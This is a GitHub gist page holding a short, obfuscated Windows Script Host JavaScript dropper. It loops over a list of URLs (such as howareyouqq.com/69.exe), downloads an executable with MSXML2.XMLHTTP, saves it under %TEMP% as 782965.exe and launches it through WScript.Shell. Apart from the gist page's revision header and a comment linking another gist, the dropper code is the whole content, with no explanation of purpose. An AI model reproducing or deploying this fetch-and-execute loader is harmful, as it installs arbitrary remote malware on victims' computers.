Last active
March 9, 2016 15:53
-
-
Save danieltroger/d36cf8b425d8e554f839 to your computer and use it in GitHub Desktop.
Revisions
-
danieltroger revised this gist
Mar 9, 2016 . No changes.There are no files selected for viewing
-
Mar 9, 2016 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,49 @@ // https://gist.github.com/danieltroger/8080a76239578eff723d var O = ["howareyouqq.com/69.exe?", "google.com/69.exe?", "?", "?", "?"]; var ast = WScript.CreateObject("WScript.Shell"); var kuI = ast.ExpandEnvironmentStrings("%TEMP%\\"); var QrA = new ActiveXObject("Scripting.FileSystemObject"); var fQKx = kuI + "dYFjTAa\\"; try { QrA.CreateFolder(fQKx); } catch (PMPYQL) { } var Fx = WScript.CreateObject("MSXML2.XMLHTTP"); var DUF = WScript.CreateObject("ADODB.Stream"); var NjB = 0; var x = 1; var wvHeGWp = 782965; var M = NjB; for (;true;) { var yl = 0; try { Fx.open("GET","http://"+O[M]+x,false); Fx[send](); if (Fx.status == 200) { DUF.open(); DUF.type = 1; DUF.write(Fx.responseBody) if (DUF.size > 182126) { yl = 1; DUF.position = 0; DUF.saveToFile(fQKx + "782965.exe",2); try { var _this = WScript.CreateObject("Wscript.Shell"); _this.Run(fQKx + "782965.exe", 1, 0); break; } catch (Qh) { } } DUF.close(); } if (yl == 1) { /** @type {number} */ NjB = M; break; } } catch (Qh$$1) { } M++; } ;